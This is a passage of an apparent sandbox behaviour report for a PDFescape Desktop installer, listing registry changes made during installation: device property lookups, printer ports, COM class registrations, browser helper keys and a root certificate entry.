\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{f01fac5d-e5f6-485f-a8c6-27446425998c}\0002 spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe -
Processes:
MsiExec.exeMsiExec.exeMsiExec.exebrowser_broker.exeMicrosoftEdge.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8}\Compatibility Flags = "32776" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar MsiExec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Toolbar\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462} = 00 MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8} MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility MsiExec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462} = 00 MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Toolbar MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe -
Modifies data under HKEY_USERS 36 IoCs
Processes:
spoolsv.exeprinter-installer-app.exemsiexec.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software printer-installer-app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\18 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:" spoolsv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer\ChooseFile = "1" printer-installer-app.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\17 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\PDFescape Desktop = "winspool,Ne03:" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Printers\DevModePerUser spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\PDFescape Desktop = "winspool,Ne03:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\PDFescape Desktop = "winspool,Ne03:" spoolsv.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:" spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\PDFescape Desktop = "winspool,Ne03:,15,45" spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer printer-installer-app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45" spoolsv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer\OpenAfterConversion = "1" printer-installer-app.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices spoolsv.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:" spoolsv.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\PDF Tools AG spoolsv.exe Key created \REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop printer-installer-app.exe -
Modifies registry class 64 IoCs
Processes:
regsvr32.exemsiexec.exeMsiExec.exeupdater-ws.exeMsiExec.exeMsiExec.exews.exeMicrosoftEdge.exews.execreator-ws.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9981C967-0000-4633-8737-F55C3CC344B0}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Applications\PDFescape Desktop.exe msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktopWordPlugIn.Connect\CurVer MsiExec.exe Key created \REGISTRY\MACHINE\Software\Classes\SystemFileAssociations\.wwf\shell\print.PDFescape Desktop msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CFAEAEBC-97F0-4D09-89C9-B25F882DAB2C}\1.0 updater-ws.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{681C8342-5595-4C45-A93A-4E6DB6A3999D} updater-ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8}\VersionIndependentProgID\ = "PDFescapeDesktop.PDFActiveDoc" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A92F07A1-0000-40B0-AF9F-CCEFA34AB08E}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CB4A1779-DC2F-4A26-BC44-29C109F7E72B}\TypeLib\Version = "1.0" updater-ws.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{50F0F03A-D82F-4234-BA86-167887BB152C}\TypeLib MsiExec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9242C198-0000-4F73-935D-1C7905796C67}\Version regsvr32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{9E5B6507-754C-4EC8-93B3-F240C0AD05BF}\AccessPermission = 010014804c0000005c000000140000003000000002001c0001000000110014000400000001010000000000100010000002001c0001000000000014000b0000000101000000000001000000000102000000000005200000002002000001020000000000052000000020020000 ws.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A4CB4452-0000-4D69-B194-10F00E72CF6B}\Version regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60E3EBCC127EC014D863DEFE735F7634\ProductIcon = "C:\\Windows\\Installer\\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\\create_icon" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1E81AD0B-0000-4107-9058-7CC9F66ACAA8}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6966A181-FCFE-49A0-84E0-D4A2E2457055}\ = "IActivationBridge" ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A4B3E576-A94E-4868-B58A-A9945E47C203}\VersionIndependentProgID\ = "PDFescapeDesktopWordPlugIn.Connect" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1A4EF6F-2D38-4065-A99E-2908CC9F31DF}\Programmable creator-ws.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{188419DA-30AB-4A88-BC26-66A045E23263} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{04B2C159-30AC-4E03-A303-00BA4EA26935}\TypeLib\ = "{159B9A1E-E6BA-4134-BBFC-A6C480193408}" ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3C0CF171-88CC-47E5-AB25-C93AFC0E7F9A}\TypeLib\Version = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A7F7470C-0000-4762-9613-155654B24238}\InprocServer32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58996E59-0000-4D4E-8CEE-5B22F2107655}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0179B7E8-0000-48EB-A99B-B1337DEB7F1E}\TypeLib\Version = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CB4A1779-DC2F-4A26-BC44-29C109F7E72B}\TypeLib\Version = "1.0" updater-ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktop.PDFPreviewer.1\CLSID\ = "{E6992C88-D2F2-4000-9B5C-C882FFBD5E7C}" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{15D3E51C-9254-4A6F-9677-BC32AC9EB05B}\TypeLib\Version = "1.0" ws.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462}\Programmable MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5F28CBA-CAF7-482E-88FD-437887EB08EF}\ = "StatVersionDll Class" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktop.PDFActiveDoc.1\DocObject\ MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F02D9237-5500-4BA6-A926-1B572AEAF3EB}\Programmable ws.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{90E5A1BE-AB4B-4CF5-B84E-A2C8CFF0DAA5}\ProxyStubClsid32 ws.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B070A15F-0000-411C-BAA4-424264999487}\Version regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\ECAB801F0EC2B7449A35862E10F9B766\main_feature = "product_feature" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CB4A1779-DC2F-4A26-BC44-29C109F7E72B}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" updater-ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B123B077-4FE5-4944-82C7-5765380D9783}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462}\Programmable MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7F592843-0000-4833-9F47-F7332F3CB3F8} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\ECAB801F0EC2B7449A35862E10F9B766 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1B7DE006-0B8A-4120-8C7A-D21622ABBDDA}\1.0\HELPDIR\ = "C:\\Program Files\\PDFescape Desktop\\creator\\plugins\\IEAddin" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{09C4B9DD-0000-459D-934A-25EC1D0B234A}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A7F7470C-0000-4762-9613-155654B24238}\Version\ = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0D73933D-0000-401D-9F25-5F1614CA7AC3} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdfescape\URL Protocol msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CFAEAEBC-97F0-4D09-89C9-B25F882DAB2C}\1.0\HELPDIR\ = "C:\\Program Files\\PDFescape Desktop" updater-ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\PDFIEPlugin.DLL\AppID = "{FB32CC69-DCE5-4191-9898-867A1F57CF0F}" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B123B077-4FE5-4944-82C7-5765380D9783}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{322C09B5-0000-4267-8909-976D51F2FC41}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{159B9A1E-E6BA-4134-BBFC-A6C480193408} ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9E3CC75B-DB58-4223-8D1E-160BBEF0574E}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" ws.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462} MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A7F7470C-0000-4762-9613-155654B24238}\InprocServer32\ = "C:\\ProgramData\\PDFescape Desktop\\Installation\\Statistics.dll" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D3C28D54-72B8-4B8D-B204-157EFA9BF3E7}\InprocServer32 MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PDFIEHelper.PDFHelperBHO.1 MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B123B077-4FE5-4944-82C7-5765380D9783}\TypeLib MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39E42990-0000-4230-9F81-62B537B6B839}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.pdf MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{55C109C9-40DA-43D3-AB08-580A8C8C627F}\1.0\FLAGS creator-ws.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{77A0A704-0000-4B96-B6F6-B635028FDFA4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9AF15867-1D90-423B-9853-E99761714165}\VersionIndependentProgID\ = "PDFIEHelper.PDFHelperBHO" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37DD0F6C-0000-46F2-8B21-3E4AB4750AFF}\InprocServer32\ = "C:\\ProgramData\\PDFescape Desktop\\Installation\\Statistics.dll" regsvr32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe -
Processes:
PDFescape_Desktop_Installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 PDFescape_Desktop_Installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 